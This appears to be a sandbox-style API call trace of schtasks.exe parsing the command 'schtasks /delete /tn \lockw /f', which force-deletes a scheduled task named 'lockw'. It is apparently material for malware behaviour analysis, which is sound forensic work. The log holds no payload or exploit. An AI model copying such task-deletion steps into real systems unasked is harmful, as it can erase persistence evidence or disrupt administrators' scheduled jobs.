[0371.533] StrStrIW (lpFirst="|delete|", lpSrch="|delete|") returned="|delete|"
[0371.533] SetLastError (dwErrCode=0x0)
[0371.533] SetLastError (dwErrCode=0x0)
[0371.533] SetLastError (dwErrCode=0x0)
[0371.533] lstrlenW (lpString="/tn") returned 3
[0371.533] lstrlenW (lpString="-/") returned 2
[0371.533] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.533] lstrlenW (lpString="?") returned 1
[0371.534] lstrlenW (lpString="?") returned 1
[0371.534] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.534] lstrlenW (lpString="tn") returned 2
[0371.534] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.534] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|?|") returned 3
[0371.534] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.535] lstrlenW (lpString="|?|") returned 3
[0371.535] lstrlenW (lpString="|tn|") returned 4
[0371.535] SetLastError (dwErrCode=0x490)
[0371.535] lstrlenW (lpString="create") returned 6
[0371.535] lstrlenW (lpString="create") returned 6
[0371.535] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.535] lstrlenW (lpString="tn") returned 2
[0371.535] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.535] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|create|") returned 8
[0371.535] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.536] lstrlenW (lpString="|create|") returned 8
[0371.536] lstrlenW (lpString="|tn|") returned 4
[0371.536] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0371.536] SetLastError (dwErrCode=0x490)
[0371.536] lstrlenW (lpString="delete") returned 6
[0371.536] lstrlenW (lpString="delete") returned 6
[0371.536] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.536] lstrlenW (lpString="tn") returned 2
[0371.536] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.536] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.536] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.538] lstrlenW (lpString="|delete|") returned 8
[0371.538] lstrlenW (lpString="|tn|") returned 4
[0371.538] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0
[0371.538] SetLastError (dwErrCode=0x490)
[0371.538] lstrlenW (lpString="query") returned 5
[0371.538] lstrlenW (lpString="query") returned 5
[0371.538] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.538] lstrlenW (lpString="tn") returned 2
[0371.538] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.538] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x8, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|query|") returned 7
[0371.538] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.538] lstrlenW (lpString="|query|") returned 7
[0371.539] lstrlenW (lpString="|tn|") returned 4
[0371.539] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0
[0371.539] SetLastError (dwErrCode=0x490)
[0371.539] lstrlenW (lpString="change") returned 6
[0371.539] lstrlenW (lpString="change") returned 6
[0371.548] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.548] lstrlenW (lpString="tn") returned 2
[0371.548] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.548] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|change|") returned 8
[0371.549] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.549] lstrlenW (lpString="|change|") returned 8
[0371.549] lstrlenW (lpString="|tn|") returned 4
[0371.549] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0
[0371.549] SetLastError (dwErrCode=0x490)
[0371.549] lstrlenW (lpString="run") returned 3
[0371.549] lstrlenW (lpString="run") returned 3
[0371.549] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.549] lstrlenW (lpString="tn") returned 2
[0371.549] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.549] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|run|") returned 5
[0371.549] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.549] lstrlenW (lpString="|run|") returned 5
[0371.550] lstrlenW (lpString="|tn|") returned 4
[0371.550] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0
[0371.550] SetLastError (dwErrCode=0x490)
[0371.550] lstrlenW (lpString="end") returned 3
[0371.550] lstrlenW (lpString="end") returned 3
[0371.550] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.550] lstrlenW (lpString="tn") returned 2
[0371.550] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.550] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|end|") returned 5
[0371.550] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.550] lstrlenW (lpString="|end|") returned 5
[0371.551] lstrlenW (lpString="|tn|") returned 4
[0371.551] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0
[0371.551] SetLastError (dwErrCode=0x490)
[0371.551] lstrlenW (lpString="showsid") returned 7
[0371.552] lstrlenW (lpString="showsid") returned 7
[0371.552] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.552] GetProcessHeap () returned 0x60000
[0371.552] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c240) returned 1
[0371.552] GetProcessHeap () returned 0x60000
[0371.552] RtlReAllocateHeap (Heap=0x60000, Flags=0xc, Ptr=0x7c240, Size=0x16) returned 0x7c240
[0371.552] lstrlenW (lpString="tn") returned 2
[0371.553] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.553] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|showsid|") returned 9
[0371.553] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.553] lstrlenW (lpString="|showsid|") returned 9
[0371.553] lstrlenW (lpString="|tn|") returned 4
[0371.554] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0
[0371.554] SetLastError (dwErrCode=0x490)
[0371.554] SetLastError (dwErrCode=0x490)
[0371.554] SetLastError (dwErrCode=0x0)
[0371.554] lstrlenW (lpString="/tn") returned 3
[0371.554] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0
[0371.554] SetLastError (dwErrCode=0x490)
[0371.554] SetLastError (dwErrCode=0x0)
[0371.554] lstrlenW (lpString="/tn") returned 3
[0371.554] GetProcessHeap () returned 0x60000
[0371.554] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x8) returned 0x7c1e0
[0371.554] GetProcessHeap () returned 0x60000
[0371.554] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cc40
[0371.554] SetLastError (dwErrCode=0x0)
[0371.555] SetLastError (dwErrCode=0x0)
[0371.555] lstrlenW (lpString="\\lockw") returned 6
[0371.555] lstrlenW (lpString="-/") returned 2
[0371.555] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0371.555] SetLastError (dwErrCode=0x490)
[0371.555] SetLastError (dwErrCode=0x490)
[0371.555] SetLastError (dwErrCode=0x0)
[0371.555] lstrlenW (lpString="\\lockw") returned 6
[0371.555] StrChrIW (lpStart="\\lockw", wMatch=0x3a) returned 0x0
[0371.555] SetLastError (dwErrCode=0x490)
[0371.555] SetLastError (dwErrCode=0x0)
[0371.555] lstrlenW (lpString="\\lockw") returned 6
[0371.555] GetProcessHeap () returned 0x60000
[0371.556] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xe) returned 0x7c270
[0371.556] GetProcessHeap () returned 0x60000
[0371.556] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cc70
[0371.556] SetLastError (dwErrCode=0x0)
[0371.556] SetLastError (dwErrCode=0x0)
[0371.556] lstrlenW (lpString="/f") returned 2
[0371.556] lstrlenW (lpString="-/") returned 2
[0371.556] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.556] lstrlenW (lpString="?") returned 1
[0371.556] lstrlenW (lpString="?") returned 1
[0371.556] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.556] lstrlenW (lpString="f") returned 1
[0371.556] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.557] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|?|") returned 3
[0371.557] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.557] lstrlenW (lpString="|?|") returned 3
[0371.557] lstrlenW (lpString="|f|") returned 3
[0371.557] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0371.558] SetLastError (dwErrCode=0x490)
[0371.558] lstrlenW (lpString="create") returned 6
[0371.558] lstrlenW (lpString="create") returned 6
[0371.558] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.558] lstrlenW (lpString="f") returned 1
[0371.558] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.574] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|create|") returned 8
[0371.574] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.574] lstrlenW (lpString="|create|") returned 8
[0371.574] lstrlenW (lpString="|f|") returned 3
[0371.574] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0371.574] SetLastError (dwErrCode=0x490)
[0371.574] lstrlenW (lpString="delete") returned 6
[0371.575] lstrlenW (lpString="delete") returned 6
[0371.575] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.575] lstrlenW (lpString="f") returned 1
[0371.575] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.575] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.575] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.575] lstrlenW (lpString="|delete|") returned 8
[0371.575] lstrlenW (lpString="|f|") returned 3
[0371.575] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0371.575] SetLastError (dwErrCode=0x490)
[0371.575] lstrlenW (lpString="query") returned 5
[0371.575] lstrlenW (lpString="query") returned 5
[0371.576] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.576] lstrlenW (lpString="f") returned 1
[0371.576] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.578] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x8, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|query|") returned 7
[0371.578] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.578] lstrlenW (lpString="|query|") returned 7
[0371.578] lstrlenW (lpString="|f|") returned 3
[0371.578] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0371.578] SetLastError (dwErrCode=0x490)
[0371.578] lstrlenW (lpString="change") returned 6
[0371.578] lstrlenW (lpString="change") returned 6
[0371.578] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.578] lstrlenW (lpString="f") returned 1
[0371.579] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.579] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|change|") returned 8
[0371.579] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.579] lstrlenW (lpString="|change|") returned 8
[0371.579] lstrlenW (lpString="|f|") returned 3
[0371.580] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0371.580] SetLastError (dwErrCode=0x490)
[0371.580] lstrlenW (lpString="run") returned 3
[0371.580] lstrlenW (lpString="run") returned 3
[0371.580] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.580] lstrlenW (lpString="f") returned 1
[0371.580] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.580] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|run|") returned 5
[0371.580] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.580] lstrlenW (lpString="|run|") returned 5
[0371.580] lstrlenW (lpString="|f|") returned 3
[0371.580] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0371.581] SetLastError (dwErrCode=0x490)
[0371.581] lstrlenW (lpString="end") returned 3
[0371.581] lstrlenW (lpString="end") returned 3
[0371.581] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.581] lstrlenW (lpString="f") returned 1
[0371.582] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.582] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|end|") returned 5
[0371.582] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.582] lstrlenW (lpString="|end|") returned 5
[0371.582] lstrlenW (lpString="|f|") returned 3
[0371.582] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0371.582] SetLastError (dwErrCode=0x490)
[0371.582] lstrlenW (lpString="showsid") returned 7
[0371.582] lstrlenW (lpString="showsid") returned 7
[0371.582] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.582] lstrlenW (lpString="f") returned 1
[0371.583] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.583] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|showsid|") returned 9
[0371.583] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.584] lstrlenW (lpString="|showsid|") returned 9
[0371.584] lstrlenW (lpString="|f|") returned 3
[0371.584] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0371.584] SetLastError (dwErrCode=0x490)
[0371.584] SetLastError (dwErrCode=0x490)
[0371.584] SetLastError (dwErrCode=0x0)
[0371.584] lstrlenW (lpString="/f") returned 2
[0371.584] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0371.584] SetLastError (dwErrCode=0x490)
[0371.584] SetLastError (dwErrCode=0x0)
[0371.584] lstrlenW (lpString="/f") returned 2
[0371.584] GetProcessHeap () returned 0x60000
[0371.584] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x6) returned 0x7c290
[0371.584] GetProcessHeap () returned 0x60000
[0371.585] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cca0
[0371.585] SetLastError (dwErrCode=0x0)
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0) returned 1
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c1e0) returned 0x8
[0371.585] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0 | out: hHeap=0x60000) returned 1
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc40) returned 1
[0371.585] GetProcessHeap () returned 0x60000
[0371.586] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cc40) returned 0x20
[0371.587] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc40 | out: hHeap=0x60000) returned 1
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c270) returned 1
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c270) returned 0xe
[0371.588] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c270 | out: hHeap=0x60000) returned 1
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc70) returned 1
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cc70) returned 0x20
[0371.589] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc70 | out: hHeap=0x60000) returned 1
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c290) returned 1
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c290) returned 0x6
[0371.589] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c290 | out: hHeap=0x60000) returned 1
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cca0) returned 1
[0371.590] GetProcessHeap () returned 0x60000
[0371.590] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cca0) returned 0x20
[0371.590] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cca0 | out: hHeap=0x60000) returned 1
[0371.590] GetProcessHeap () returned 0x60000
[0371.590] GetProcessHeap () returned 0x60000
[0371.590] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9b0) returned 1
[0371.590] GetProcessHeap () returned 0x60000
[0371.590] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7b9b0) returned 0x18
[0371.590] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9b0 | out: hHeap=0x60000) returned 1
[0371.592] SetLastError (dwErrCode=0x0)
[0371.592] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0371.592] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0371.592] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0371.592] VerifyVersionInfoW (in: lpVersionInformation=0x24f490, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24f490) returned 1
[0371.592] SetLastError (dwErrCode=0x0)
[0371.592] lstrlenW (lpString="delete") returned 6
[0371.592] StrChrIW (lpStart="delete", wMatch=0x7c) returned 0x0
[0371.599] SetLastError (dwErrCode=0x490)
[0371.600] SetLastError (dwErrCode=0x0)
[0371.600] lstrlenW (lpString="delete") returned 6
[0371.600] GetProcessHeap () returned 0x60000
[0371.600] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cca0
[0371.600] GetProcessHeap () returned 0x60000
[0371.600] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7b9b0
[0371.600] _memicmp (_Buf1=0x7b9b0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.600] GetProcessHeap () returned 0x60000
[0371.600] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x16) returned 0x7c1e0
[0371.600] SetLastError (dwErrCode=0x0)
[0371.600] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.600] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7bc10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0371.600] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0371.601] GetProcessHeap () returned 0x60000
[0371.601] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x74e) returned 0x7d4d0
[0371.601] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x7d4d0 | out: lpData=0x7d4d0) returned 1
[0371.601] VerQueryValueW (in: pBlock=0x7d4d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24f578, puLen=0x24f5e0 | out: lplpBuffer=0x24f578*=0x7d86c, puLen=0x24f5e0) returned 1
[0371.601] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.602] _vsnwprintf (in: _Buffer=0x7bc10, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24f558 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0371.602] VerQueryValueW (in: pBlock=0x7d4d0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f5e8, puLen=0x24f5d8 | out: lplpBuffer=0x24f5e8*=0x7d698, puLen=0x24f5d8) returned 1
[0371.602] lstrlenW (lpString="schtasks.exe") returned 12
[0371.602] lstrlenW (lpString="schtasks.exe") returned 12
[0371.602] lstrlenW (lpString=".EXE") returned 4
[0371.602] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0371.602] lstrlenW (lpString="schtasks.exe") returned 12
[0371.602] lstrlenW (lpString=".EXE") returned 4
[0371.602] lstrlenW (lpString="schtasks") returned 8
[0371.602] lstrlenW (lpString="/delete") returned 7
[0371.602] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.602] _vsnwprintf (in: _Buffer=0x7bc10, _BufferCount=0x19, _Format="%s %s", _ArgList=0x24f558 | out: _Buffer="schtasks /delete") returned 16
[0371.603] _memicmp (_Buf1=0x7ba90, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.603] GetProcessHeap () returned 0x60000
[0371.603] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cc70
[0371.604] _memicmp (_Buf1=0x7bab0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.604] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x7d2c0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0371.604] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0371.604] GetProcessHeap () returned 0x60000
[0371.604] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x30) returned 0x77c10
[0371.604] _vsnwprintf (in: _Buffer=0x7c010, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24f558 | out: _Buffer="Type \"SCHTASKS /DELETE /?\" for usage.") returned 37
[0371.604] GetProcessHeap () returned 0x60000
[0371.604] GetProcessHeap () returned 0x60000
[0371.604] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7d4d0) returned 1
[0371.604] GetProcessHeap () returned 0x60000
[0371.604] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7d4d0) returned 0x74e
[0371.605] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7d4d0 | out: hHeap=0x60000) returned 1
[0371.605] SetLastError (dwErrCode=0x0)
[0371.605] GetThreadLocale () returned 0x409
[0371.606] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.606] lstrlenW (lpString="delete") returned 6
[0371.606] GetThreadLocale () returned 0x409
[0371.606] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.606] lstrlenW (lpString="?") returned 1
[0371.606] GetThreadLocale () returned 0x409
[0371.606] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.606] lstrlenW (lpString="s") returned 1
[0371.606] GetThreadLocale () returned 0x409
[0371.606] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.606] lstrlenW (lpString="u") returned 1
[0371.606] GetThreadLocale () returned 0x409
[0371.607] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.607] lstrlenW (lpString="p") returned 1
[0371.607] GetThreadLocale () returned 0x409
[0371.607] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.608] lstrlenW (lpString="tn") returned 2
[0371.608] GetThreadLocale () returned 0x409
[0371.608] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.608] lstrlenW (lpString="f") returned 1
[0371.608] SetLastError (dwErrCode=0x0)
[0371.608] SetLastError (dwErrCode=0x0)
[0371.608] lstrlenW (lpString="/delete") returned 7
[0371.609] lstrlenW (lpString="-/") returned 2
[0371.609] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.609] lstrlenW (lpString="delete") returned 6
[0371.609] lstrlenW (lpString="delete") returned 6
[0371.609] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.609] lstrlenW (lpString="delete") returned 6
[0371.609] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.609] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|delete|") returned 8
[0371.609] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|delete|") returned 8
[0371.609] lstrlenW (lpString="|delete|") returned 8
[0371.609] lstrlenW (lpString="|delete|") returned 8
[0371.609] StrStrIW (lpFirst="|delete|", lpSrch="|delete|") returned="|delete|"
[0371.609] SetLastError (dwErrCode=0x0)
[0371.610] SetLastError (dwErrCode=0x0)
[0371.610] SetLastError (dwErrCode=0x0)
[0371.610] lstrlenW (lpString="/tn") returned 3
[0371.610] lstrlenW (lpString="-/") returned 2
[0371.610] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
